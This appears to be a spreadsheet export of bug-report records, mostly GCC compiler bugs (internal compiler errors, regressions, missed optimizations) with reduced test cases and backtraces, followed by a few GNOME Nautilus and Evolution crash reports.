See  for instructions.
Tested revisions:
r171735 - crash
4.6 r171597 - crash
4.5 r171597 - crash
4.4 r171597 - doesn't know __builtin_unreachable</t>
  </si>
  <si>
    <t>GCC-30539</t>
  </si>
  <si>
    <t>Accepts invalid explicit specialization declaration</t>
  </si>
  <si>
    <t>The following invalid code (note the duplicate X::X::) is accepted
and apparently has always been:
------------
template  struct X {
    void f()
}
template  void X::X::f()
------------     ^^^^^^^^^^^^</t>
  </si>
  <si>
    <t>GCC-9189</t>
  </si>
  <si>
    <t>[3.4 regression] [New parser] Order of default argument processing and function body compilation</t>
  </si>
  <si>
    <t>Regression from the old parser...
Compiling the code provided gives:
hawai-&gt;g++ ~/tmp/test6.C
/0/user/papadop/tmp/test6.C: In constructor `A::A()':
/0/user/papadop/tmp/test6.C:10: error: the default argument for parameter 0 of 
   `void A::f(int)' has not yet been parsed
which is (I believe) a wrong error.
Release:
gcc version 3.4 20030105 (experimental)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Compile the given code.</t>
  </si>
  <si>
    <t>GCC-43453</t>
  </si>
  <si>
    <t>Initialization of char array with string literal fails in mem-initializer</t>
  </si>
  <si>
    <t>Fails to compile but should work:
struct A { 
  char x[4] 
  A():x(bug) { } 
}
Error i get is:
main.cpp:3: error: array used as initializer</t>
  </si>
  <si>
    <t>GCC-3573</t>
  </si>
  <si>
    <t>When compiling the file bug.c containing simply:
void kill_gcc3(void)
{
     double x = 0.0 y
     y = *(
     if (!(&amp;y != &amp;x)) {
     }
}
with:
	 gcc -c -O bug.c
I get:
bug.c: In function `kill_gcc3':
bug.c:7: Internal compiler error in fixup_var_refs_1 at function.c:1922
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Note that it is important to use -O in order to trigger the bug.
Thanks for your attention!
Cordially
Steven G. Johnson
Release:
gcc 3.0
Environment:
Debian GNU/Linux 2.2r3 on 1GHz Dual Pentium III gcc compiled from source with 'make bootstrap'
How-To-Repeat:
See description above (compile the provided function with gcc -c -O).</t>
  </si>
  <si>
    <t>GCC-52241</t>
  </si>
  <si>
    <t>Performance degradation of 447.dealII on corei7 at spec2006_base32.</t>
  </si>
  <si>
    <t>Guilty commit
c1e8b3edf7b5038f070c7a9732e58d066081a636 is the first bad commit
commit c1e8b3edf7b5038f070c7a9732e58d066081a636
Author: bkoz 
Date: Mon Jan 23 23:12:01 2012 +0000
caused performance degradation of 447.dealII benchspec 2006.It was happened
because there are no inlining a library routine '_Rb_tree_node_base' from
libstdc++-v3/src/tree.cc
const _Rb_tree_node_base*  _Rb_tree_increment(const _Rb_tree_node_base* __x)
throw ()
{    
  return Rb_tree_increment(const_cast_Rb_tree_node_base*(_x))
}
I found out that the degradation is caused by absence of -fPIC flag in
compilation command line. If I add the flag to command line the inlining is
happened.</t>
  </si>
  <si>
    <t>GCC-46916</t>
  </si>
  <si>
    <t>gcc.dg/torture/stackalign/non-local-goto-[12].c ICEs compiler due to r167727</t>
  </si>
  <si>
    <t>When gcc trunk is built with profiledbootstrap the resulting compiler exhibits ICEs in...
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-1.c  -O1  compilation failed to produce executable
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  (test for excess errors)
WARNING: gcc.dg/torture/stackalign/non-local-goto-2.c  -O1  compilation failed to produce executable
These are of the form...
/Users/howarth/darwin_objdir/gcc/xgcc -B/Users/howarth/darwin_objdir/gcc/ /Users/howarth/gcc/gcc/testsuite/gcc.dg/torture/stackalign/non-local-goto-1.c   -O1  -mstackrealign -mpreferred-stack-boundary=5 -mno-mmx  -lm   -m32 -o ./non-local-goto-1.exe
xgcc: internal compiler error: Segmentation fault (program cc1)
and backtrace as...
Program received signal EXC_BAD_ACCESS Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00007fff5bc00fe0
0x0000000100829fa8 in htab_find_slot_with_hash (htab=0x143200af0 element= hash= insert=INSERT) at ../../gcc/libiberty/hashtab.c:668
668	  else if ((*htab-&gt;eq_f) (entry element))
(gdb) bt
#0  0x0000000100829fa8 in htab_find_slot_with_hash (htab=0x143200af0 element= hash= insert=INSERT) at ../../gcc/libiberty/hashtab.c:668
#1  0x00000001007bc701 in cgraph_node (decl=0x143304e00) at ../../gcc/gcc/cgraph.c:502
(gdb)</t>
  </si>
  <si>
    <t>GCC-10962</t>
  </si>
  <si>
    <t>[3.3 regression] lookup_field is a linear search on a linked list (can be slow if large struct)</t>
  </si>
  <si>
    <t>According to the comments of lookup_field it seems that TYPE_LANG_SPECIFIC should 
have the sorted list for a binary search.</t>
  </si>
  <si>
    <t>GCC-16494</t>
  </si>
  <si>
    <t>[3.3.2/3.4/3.5] Pessimization with FP conditional branches</t>
  </si>
  <si>
    <t>On non-V9 targets when delay slots are not filled FP conditional branches are
unnecessarily reversed:
[eric@localhost obj.sparc]$ cat t.c
int foo(float f1 float f2)
{
  if (f1 &gt; f2)
    return 0
  else
    return 1
}
[eric@localhost obj.sparc]$ gcc/cc1 -Bgcc t.c -mcpu=v7 -O2 -fno-delayed-branch
[eric@localhost obj.sparc]$ cat t.s
        .file   t.c
        .section        .text
        .align 4
        .global foo
        .type   foo #function
        .proc   04
foo:
        !#PROLOGUE# 0
        add     %sp -120 %sp
        !#PROLOGUE# 1
        st      %o0 [%sp+100]
        ld      [%sp+100] %f9
        st      %o1 [%sp+100]
        ld      [%sp+100] %f8
        fcmpes  %f9 %f8
        mov     0 %o0
        nop
        fbule   .+16
        nop
        b       .LL1
        nop
        mov     1 %o0
.LL1:
        retl
        sub     %sp -120 %sp
        .size   foo .-foo
        .ident  GCC: (GNU) 3.3.5 20040703 (prerelease)
The expected assembly output is:
        .file   t.c
        .section        .text
        .align 4
        .global foo
        .type   foo #function
        .proc   04
foo:
        !#PROLOGUE# 0
        add     %sp -120 %sp
        !#PROLOGUE# 1
        st      %o0 [%sp+100]
        ld      [%sp+100] %f9
        st      %o1 [%sp+100]
        ld      [%sp+100] %f8
        fcmpes  %f9 %f8
        mov     0 %o0
        nop
        fbg     .LL1
        nop
        mov     1 %o0
.LL1:
        retl
        sub     %sp -120 %sp
        .size   foo .-foo
        .ident  GCC: (GNU) 3.3.5 20040703 (prerelease)
This was inadvertently introduced by:
2003-10-01  Eric Botcazou  
	PR optimization/11753
	* config/sparc/sparc.md (length attribute) [fcc branch]: Add 1 to
	the length in the non-V9 case.
because there is an undocumented side-effect associated with having a length
greater or equal to 3 for FP conditional branches.</t>
  </si>
  <si>
    <t>GCC-39411</t>
  </si>
  <si>
    <t>GNAT BUG DETECTED: implementation of protected interface by protected type</t>
  </si>
  <si>
    <t>Hi Team
I have 'GNAT BUG DETECTED' error message when I try to compile my project. I am providing the more simple example of source code which will help to reproduce the problem.
Please advise
+===========================GNAT BUG DETECTED==============================+
| 4.3.2 (i386-portbld-freebsd7.0) Assert_Failure sinfo.adb:1079            |
| Error detected at sample.ads:29:5                                        |
| Please submit a bug report see http://gcc.gnu.org/bugs.html.            |
| Use a subject line meaningful to you and us to track the bug.            |
| Include the entire contents of this bug box in the report.               |
| Include the exact gcc or gnatmake command that you entered.              |
| Also include sources listed below in gnatchop format                     |
| (concatenated together with no headers between files).                   |
+==========================================================================+
----------------------------------------------------------------------------
The gcc -v output:
Using built-in specs.
Target: i386-portbld-freebsd7.0
Configured with: ./..//gcc-4.3.2/configure --enable-languages=cada --disable-nls --with-system-zlib --with-libiconv-prefix=/usr/local --program-suffix=43 --bindir=/usr/local/bin/gcc43 --libdir=/usr/local/lib/gcc-4.3.2 --prefix=/usr/local --mandir=/usr/local/man --infodir=/usr/local/info/gcc43 --build=i386-portbld-freebsd7.0
Thread model: posix
gcc version 4.3.2 (GCC)
----------------------------------------------------------------------------
The compilation command:
$ gnatmake -p -P sample.gpr
The source/project files:
-------------------------------- sample.ads ---------------------------------
--                                                                         --
--  Author: Andriy Bakay                              --
--                                                                         --
--  Indent: 4                                                              --
--  Tabs:   no                                                             --
--                                                                         --
--  Copyright (c) Andriy Bakay. 2009                                       --
--      All rights reserved.                                               --
--                                                                         --
-----------------------------------------------------------------------------
package Sample is
    type Return_Code is mod 2 ** 32
    type Interface_Type is protected interface
    procedure Write(
        Inst    : in out Interface_Type
        RC      :    out Return_Code
        D       : in     Integer ) is abstract
    function Read(
        Inst    : in Interface_Type
        D       : not null access Integer )
        return       Return_Code is abstract
    protected type Instance is new Interface_Type with
        overriding
        procedure Write(
            RC      :    out Return_Code
            D       : in     Integer )
        overriding
        function Read(
            D       : not null access Integer )
            return    Return_Code
    private
        Data    : Integer   := 0
    end Instance
end Sample
-------------------------------- sample.ads ---------------------------------
-------------------------------- sample.adb ---------------------------------
--                                                                         --
--  Author: Andriy Bakay                              --
--                                                                         --
--  Indent: 4                                                              --
--  Tabs:   no                                                             --
--                                                                         --
--  Copyright (c) Andriy Bakay. 2009                                       --
--      All rights reserved.                                               --
--                                                                         --
-----------------------------------------------------------------------------
package body Sample is
    protected body Instance is
        procedure Write(
            RC      :    out Return_Code
            D       : in     Integer )
        is
        begin
            RC      := 0
            Data    := D
        end Write
        function Read(
            D       : not null access Integer )
            return    Return_Code
        is
        begin
            D.all   := Data
            return 0
        end Read
    end Instance
end Sample
-------------------------------- sample.adb ---------------------------------
-------------------------------- common.gpr ---------------------------------
--                                                                         --
--  Author: Andriy Bakay                              --
--                                                                         --
--  Indent: 4                                                              --
--  Tabs:   no                                                             --
--                                                                         --
--  Copyright (c) Andriy Bakay. 2009                                       --
--      All rights reserved.                                               --
--                                                                         --
-----------------------------------------------------------------------------
project Common is
    type Config_Type is ( debug release )
    type Lib_Kind is ( static relocatable )
    Config      : Config_Type   := external( CONFIG debug )
    Lib_Type    : Lib_Kind      := external( LIB_TYPE static )
    OS_Name                     := external( OS_NAME )
    OS_Version                  := external( OS_VERSION )
    Comp_Name                   := external( COMPILER_NAME )
    Root_Dir                    := external( ROOT_DIR )
    Build_Root                  := external( BUILD_ROOT )
    Bld_Dir                     := Root_Dir &amp; / &amp;
                                   Build_Root &amp; / &amp;
                                   OS_Name &amp; _ &amp; OS_Version &amp; / &amp;
                                   Comp_Name &amp; / &amp;
                                   Config
    Obj_Dir                     := Bld_Dir 
    Lib_Dir                     := Bld_Dir 
    Bin_Dir                     := Bld_Dir 
    for Source_Dirs use ()
    Comm_Flags                  := ()
    Comp_Flags                  := ( -Wall -gnato -gnatwa -gnatwl )
    case Config is
        when debug    =&gt;
            Comm_Flags          := Comm_Flags 
            Comp_Flags          := Comp_Flags 
        when release  =&gt;
            Comp_Flags          := Comp_Flags 
    end case
    package Builder is
        for Default_Switches( Ada ) use ( -s )
    end Builder
    package Compiler is
        for Default_Switches( Ada ) use Comm_Flags 
    end Compiler
    package Linker is
        for Default_Switches( Ada ) use Comm_Flags
    end Linker
end Common
-------------------------------- common.gpr ---------------------------------
-------------------------------- sample.gpr ---------------------------------
--                                                                         --
--  Author: Andriy Bakay                              --
--                                                                         --
--  Indent: 4                                                              --
--  Tabs:   no                                                             --
--                                                                         --
--  Copyright (c) Andriy Bakay. 2009                                       --
--      All rights reserved.                                               --
--                                                                         --
-----------------------------------------------------------------------------
with common.gpr
project Sample is
    Lib_Name    := irsample
    Lib_Ver     := 1.0
    for Object_Dir use Common.Obj_Dir 
    for Library_Dir use Common.Lib_Dir
    for Library_Name use Lib_Name
    for Library_Kind use Common.Lib_Type
    for Library_Version use lib 
    package Builder renames Common.Builder
    package Compiler renames Common.Compiler
    package Linker renames Common.Linker
end Sample
-------------------------------- sample.gpr ---------------------------------</t>
  </si>
  <si>
    <t>andriy</t>
  </si>
  <si>
    <t>GCC-54712</t>
  </si>
  <si>
    <t>internal compiler error: in gimple_get_virt_method_for_binfo at gimple-fold.c</t>
  </si>
  <si>
    <t>Created attachment 28277
Preprocessed file.
MinGW GCC 4.7.0 threw this very odd error at me.  I believe the following -v output contains all of the required information along with this .ii pre-processed file.
Building CXX object client/CMakeFiles/odamex.dir/sdl/i_musicsystem.cpp.obj
Using built-in specs.
COLLECT_GCC=C:\MinGW\bin\g++.exe
Target: mingw32
Configured with: ../gcc-4.7.0/configure --enable-languages=cc++adafortranobjcobj-c++ --disable-sjlj-exceptions --with-dwarf2 --enable-shared --enable-libgomp --disable-win32-registry --enable-libstdcxx-debug --disable-build-poststage1-with-cxx --enable-version-specific-runtime-libs --build=mingw32 --prefix=/mingw
Thread model: win32
gcc version 4.7.0 (GCC) 
COLLECT_GCC_OPTIONS='-D' 'WIN32' '-D' 'NOASM' '-D' 'PORTMIDI' '-O2' '-v' '-save-temps' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../common' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../textscreen' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/sdl' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/src' '-I' 'C:/Users/AlexMax/Documents/Libraries/SDL-1.2.15/include/SDL' '-I' 'C:/Users/AlexMax/Documents/Libraries/SDL_mixer-1.2.12/include' '-I' 'C:/Users/AlexMax/Documents/Libraries/portmidi/build/portmidi-devel_win32' '-o' 'CMakeFiles\odamex.dir\sdl\i_musicsystem.cpp.obj' '-c' '-shared-libgcc' '-mtune=i386' '-march=i386'
 c:/mingw/bin/../libexec/gcc/mingw32/4.7.0/cc1plus.exe -E -quiet -v -I C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../common -I C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../textscreen -I C:/Users/AlexMax/Documents/Workspace/odamex-git/client/sdl -I C:/Users/AlexMax/Documents/Workspace/odamex-git/client/src -I C:/Users/AlexMax/Documents/Libraries/SDL-1.2.15/include/SDL -I C:/Users/AlexMax/Documents/Libraries/SDL_mixer-1.2.12/include -I C:/Users/AlexMax/Documents/Libraries/portmidi/build/portmidi-devel_win32 -iprefix c:\mingw\bin\../lib/gcc/mingw32/4.7.0/ -D WIN32 -D NOASM -D PORTMIDI C:\Users\AlexMax\Documents\Workspace\odamex-git\client\sdl\i_musicsystem.cpp -mtune=i386 -march=i386 -O2 -fpch-preprocess -o i_musicsystem.ii
ignoring nonexistent directory c:\mingw\bin\../lib/gcc/mingw32/4.7.0/../../../../mingw32/include
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.7.0/include/c++
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.7.0/include/c++/mingw32
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.7.0/include/c++/backward
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.7.0/include
ignoring duplicate directory /mingw/lib/gcc/mingw32/4.7.0/../../../../include
ignoring duplicate directory c:/mingw/lib/gcc/../../include
ignoring duplicate directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.7.0/include-fixed
ignoring nonexistent directory c:/mingw/lib/gcc/../../lib/gcc/mingw32/4.7.0/../../../../mingw32/include
ignoring duplicate directory /mingw/include
#include ... search starts here:
#include  search starts here:
 C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../common
 C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../textscreen
 C:/Users/AlexMax/Documents/Workspace/odamex-git/client/sdl
 C:/Users/AlexMax/Documents/Workspace/odamex-git/client/src
 C:/Users/AlexMax/Documents/Libraries/SDL-1.2.15/include/SDL
 C:/Users/AlexMax/Documents/Libraries/SDL_mixer-1.2.12/include
 C:/Users/AlexMax/Documents/Libraries/portmidi/build/portmidi-devel_win32
 c:\mingw\bin\../lib/gcc/mingw32/4.7.0/include/c++
 c:\mingw\bin\../lib/gcc/mingw32/4.7.0/include/c++/mingw32
 c:\mingw\bin\../lib/gcc/mingw32/4.7.0/include/c++/backward
 c:\mingw\bin\../lib/gcc/mingw32/4.7.0/include
 c:\mingw\bin\../lib/gcc/mingw32/4.7.0/../../../../include
 c:\mingw\bin\../lib/gcc/mingw32/4.7.0/include-fixed
End of search list.
COLLECT_GCC_OPTIONS='-D' 'WIN32' '-D' 'NOASM' '-D' 'PORTMIDI' '-O2' '-v' '-save-temps' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../common' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/../textscreen' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/sdl' '-I' 'C:/Users/AlexMax/Documents/Workspace/odamex-git/client/src' '-I' 'C:/Users/AlexMax/Documents/Libraries/SDL-1.2.15/include/SDL' '-I' 'C:/Users/AlexMax/Documents/Libraries/SDL_mixer-1.2.12/include' '-I' 'C:/Users/AlexMax/Documents/Libraries/portmidi/build/portmidi-devel_win32' '-o' 'CMakeFiles\odamex.dir\sdl\i_musicsystem.cpp.obj' '-c' '-shared-libgcc' '-mtune=i386' '-march=i386'
 c:/mingw/bin/../libexec/gcc/mingw32/4.7.0/cc1plus.exe -fpreprocessed i_musicsystem.ii -quiet -dumpbase i_musicsystem.cpp -mtune=i386 -march=i386 -auxbase-strip CMakeFiles\odamex.dir\sdl\i_musicsystem.cpp.obj -O2 -version -o i_musicsystem.s
GNU C++ (GCC) version 4.7.0 (mingw32)
	compiled by GNU C version 4.7.0 GMP version 5.0.1 MPFR version 2.4.1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.7.0 (mingw32)
	compiled by GNU C version 4.7.0 GMP version 5.0.1 MPFR version 2.4.1 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 9fc40f37d31a03e5502141ce58bdf4c7
C:\Users\AlexMax\Documents\Workspace\odamex-git\client\sdl\i_musicsystem.cpp:1113:262: internal compiler error: in gimple_get_virt_method_for_binfo at gimple-fold.c:3107
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>alexmax2742</t>
  </si>
  <si>
    <t>GCC-39033</t>
  </si>
  <si>
    <t xml:space="preserve">DEC_EVAL_METHOD missing from </t>
  </si>
  <si>
    <t>Using gcc 4.3.2-7 on Intel Pentium running Linux Fedora Core 10
with -std=gnu99 of
/* DFP TR 24732 == WG14 / N1176 N1312 */
#define __STDC_WANT_DEC_FP__ /* Tell implementation that we want Decimal FP */
#include 	/* DEC_EVAL_METHOD */
#ifndef DEC_EVAL_METHOD
#error Missing DEC_EVAL_METHOD
#endif
int main(void){
    return 0
}
gets:
. /usr/lib/gcc/i386-redhat-linux/4.3.2/include/float.h
test3.c:6:2: error: #error Missing DEC_EVAL_METHOD</t>
  </si>
  <si>
    <t>GCC-58027</t>
  </si>
  <si>
    <t>Arithmetic overflow converting ... in PARAMETER triggers an ICE</t>
  </si>
  <si>
    <t>Compiling the following code (extracted from http://mathalacarte.com/hpcconsult):
  INTEGER PARAMETER :: ISCLASS(1) = &amp;
    (/&amp;
    Z'FF800000'&amp; ! IEEE_NEGATIVE_INF
    /)
    print * isclass
end
gives the following ICE
isclass_3.f90: In function 'MAIN__':
isclass_3.f90:5:0: internal compiler error: in gfc_conv_array_initializer at fortran/trans-array.c:5473
     print * isclass
while it compiles with -fno-range-check.</t>
  </si>
  <si>
    <t>GCC-5094</t>
  </si>
  <si>
    <t>partial specialisation cannot be friend??</t>
  </si>
  <si>
    <t>The attached file tries several configuration of friend declaration.
Some of them fails I think these should behave identically to those
not failing.
arta:~/c/proba$ /gml/shared/gcc-3.0.2/bin/g++ -c specfriend.cc 
specfriend.cc:42: partial specialization `c &gt;' declared `friend'
specfriend.cc:55: partial specialization `d &gt;' declared `friend'
specfriend.cc:59: expected 1 levels of template parms for `class b::inner' 
   got 2
specfriend.cc:71: partial specialization `d &gt;' declared `friend'
zsh: exit 1     /gml/shared/gcc-3.0.2/bin/g++ -c specfriend.cc
arta:~/c/proba$
Release:
3.0.2
Environment:
SuSE 7.1 i686</t>
  </si>
  <si>
    <t>benko</t>
  </si>
  <si>
    <t>GCC-57073</t>
  </si>
  <si>
    <t>__builtin_powif (-1.0 k) should be optimized to 1.0 - 2.0 * (K%2)</t>
  </si>
  <si>
    <t>Motivated by PR57071.
In numerical code it is not unlike to find code of the form (-1.0) raised to the power of k in Fortran: (-1.0)**k.
That translates into:
  __builtin_powif (-1.0e+0 k)
which stays that way even with -O3.
Expected: It gets optimized to 1.0 - 2.0 * (K%2)
Fortran test case:
real function f(k)
  integer value :: k
  f = (-1.0)**k
end</t>
  </si>
  <si>
    <t>GCC-84112</t>
  </si>
  <si>
    <t>[8 Regression] powerpc64le ICE in LRA on openjdk</t>
  </si>
  <si>
    <t>The following testcase ICEs with -mcpu=power8 -O3 -fstack-protector-strong -fpic on powerpc64le-linux with:
rh1539812.i: In function â€˜fooâ€™:
rh1539812.i:30:1: internal compiler error: in lra_set_insn_recog_data at lra.c:998
 }
 ^
0xd2da3d lra_set_insn_recog_data(rtx_insn*)
	../../gcc/lra.c:996
0xd2b6c5 lra_get_insn_recog_data
	../../gcc/lra-int.h:491
0xd2f70b lra_update_insn_regno_info(rtx_insn*)
	../../gcc/lra.c:1622
0xd2fcb1 lra_push_insn_1
	../../gcc/lra.c:1773
0xd2fce4 lra_push_insn(rtx_insn*)
	../../gcc/lra.c:1781
The instruction in question is:
(insn 1791 1790 1241 3 (set (reg:DI 1769)
        (and:DI (plus:DI (reg:DI 1768)
                (reg:DI 1594))
            (const_int -16 [0xfffffffffffffff0]))) -1
     (nil))
char *b
int c d e f
void
foo (char *h int k int l int m int j int q)
{
  char *i = b
  int n = d
  int s = e
  while (c)
    {
      for ( j &lt;= 0 j += 12)
	{
	  i[j] = n 
	  i[j + 1] = n 
	  i[j + 2] = n 
	  i[j + 3] = n 
	  i[j + 4] = n 
	  i[j + 5] = n 
	  i[j + 6] = n 
	  i[j + 7] = n 
	  i[j + 8] = n 
	  i[j + 9] = n 
	  i[j + 10] = n 
	  i[j + 11] = n 
	}
      while (j &lt; f)
    }
}</t>
  </si>
  <si>
    <t>GCC-69432</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in connect_traces at dwarf2cfi.c with -O3 -m32 -minline-stringops-dynamically</t>
  </si>
  <si>
    <t>Created attachment 37434
C-reduced testcase
The attached testcase is reduced from cromfs-1.5.10.2.
On my x86_64-linux desktop compiling with
path_to_trunk/inst/bin/g++ -O3 -m32 -minline-stringops-dynamically -S creduced.C
leads to:
  creduced.C: In function â€˜void LZMADeCompress()â€™:
  creduced.C:63:33: internal compiler error: in connect_traces at dwarf2cfi.c:2752
   void LZMADeCompress() { F b(a) }
                                 ^
  0xaa8a6a connect_traces
          /home/mjambor/gcc/trunk/src/gcc/dwarf2cfi.c:2752
  0xaac866 execute_dwarf2_frame
          /home/mjambor/gcc/trunk/src/gcc/dwarf2cfi.c:2975
The ICE happens with trunk and branches for gcc 5 and 4.9 but does not
with 4.8.
(Please change the component if you can think of a more suitable one.
As you can see -g is not necessary so I suspect this is an EH bug
rather than a debug issue.  I also can't tell to what extent this is a
target bug.)</t>
  </si>
  <si>
    <t>gnome_bug_report_data.csv</t>
  </si>
  <si>
    <t>NAUTILUS-438485</t>
  </si>
  <si>
    <t>NAUTILUS</t>
  </si>
  <si>
    <t>crash in File Browser: -Navegar un directorio c...</t>
  </si>
  <si>
    <t>Version: 2.18.1
What were you doing when the application crashed?
-Navegar un directorio con muchos svg (openclipart)
-Dar a la ruleta del raton. 
Distribution: Debian lenny/sid
Gnome Release: 2.18.1 2007-04-25 (Debian)
BugBuddy Version: 2.18.1
System: Linux 2.6.20-1-686 #1 SMP Tue Apr 24 21:52:11 UTC 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: gnome
Memory status: size: 75948032 vsize: 75948032 resident: 27508736 share: 14749696 rss: 27508736 rss_rlim: 4294967295
CPU usage: start_time: 1179190815 rtime: 1397 utime: 1220 stime: 177 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/nautilus'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1226991936 (LWP 16292)]
[New Thread -1252897904 (LWP 16333)]
(no debugging symbols found)
0xb732a379 in poll () from /lib/libc.so.6
#0  0xb732a379 in poll () from /lib/libc.so.6
#1  0xb7442f53 in ?? () from /usr/lib/libX11.so.6
#2  0x0819c960 in ?? ()
#3  0x00000001 in ?? ()
#4  0xffffffff in ?? ()
#5  0xb74ecb24 in ?? () from /usr/lib/libX11.so.6
#6  0x0819da00 in ?? ()
#7  0xb74ecb24 in ?? () from /usr/lib/libX11.so.6
#8  0x0819da00 in ?? ()
#9  0x00000000 in ?? ()
Thread 2 (Thread -1252897904 (LWP 16333)):
#0  0xb75d2f61 in ?? () from /lib/libpthread.so.0
No symbol table info available.
#1  0xb7c8a865 in ?? () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#2  0x00003fce in ?? ()
No symbol table info available.
#3  0xb5521ed8 in ?? ()
No symbol table info available.
#4  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread -1226991936 (LWP 16292)):
#0  0xb732a379 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0xb7442f53 in ?? () from /usr/lib/libX11.so.6
No symbol table info available.
#2  0x0819c960 in ?? ()
No symbol table info available.
#3  0x00000001 in ?? ()
No symbol table info available.
#4  0xffffffff in ?? ()
No symbol table info available.
#5  0xb74ecb24 in ?? () from /usr/lib/libX11.so.6
No symbol table info available.
#6  0x0819da00 in ?? ()
No symbol table info available.
#7  0xb74ecb24 in ?? () from /usr/lib/libX11.so.6
No symbol table info available.
#8  0x0819da00 in ?? ()
No symbol table info available.
#9  0x00000000 in ?? ()
No symbol table info available.
#0  0xb732a379 in poll () from /lib/libc.so.6
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]
----------- .xsession-errors (24032 sec old) ---------------------
[68] [69] [70] [71] [72] [73] [74] [75] [76] [77] [78] [79] [80] [81] [82]
[83] [84] [85] [86] [87] [88] [89] [90])
(/usr/share/texmf-texlive/fonts/source/public/cm/romanl.mf [97] [98] [99]
[100] [101] [102] [103] [104] [105] [106] [107] [108] [109] [110] [111]
[112] [113] [114] [115] [116] [117] [118] [119] [120] [121] [122])
(/usr/share/texmf-texlive/fonts/source/public/cm/greeku.mf [0] [1] [2] [3]
[4] [5] [6] [7] [8] [9] [10])
(/usr/share/texmf-texlive/fonts/source/public/cm/romand.mf [48] [49] [50]
[51] [52] [53] [54] [55] [56] [57])
(/usr/share/texmf-texlive/fonts/source/public/cm/romanp.mf [36] [38] [63]
[62]) (/usr/share/texmf-texlive/fonts/source/public/cm/romspl.mf [16] [17]
[25] [26] [27] [28]) (/usr/share/texmf-texlive/fonts/source/public/cm/romspu.mf
[29] [30] [31]) (/usr/share/texmf-texlive/fonts/source/public/cm/punct.mf
[33] [60] [35] [37] [39] [40] [41] [42] [43] [44] [46
...Too much output ignoring rest...
--------------------------------------------------</t>
  </si>
  <si>
    <t>nautilus-maint</t>
  </si>
  <si>
    <t>EVOLUTION-231772</t>
  </si>
  <si>
    <t>Mailer</t>
  </si>
  <si>
    <t>EVOLUTION</t>
  </si>
  <si>
    <t>Crash: closing evolution</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.1.1.99
Synopsis: closing evolution
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Description:
just normal closing not sure how to reproduce.
Debugging Information:
[New Thread 1024 (LWP 11299)]
[New Thread 2049 (LWP 11344)]
[New Thread 1026 (LWP 11345)]
[New Thread 2051 (LWP 11346)]
[New Thread 3076 (LWP 11349)]
0x410eb369 in __wait4 () at __wait4:-1
	in __wait4
#0  0x410eb369 in __wait4 () at __wait4:-1
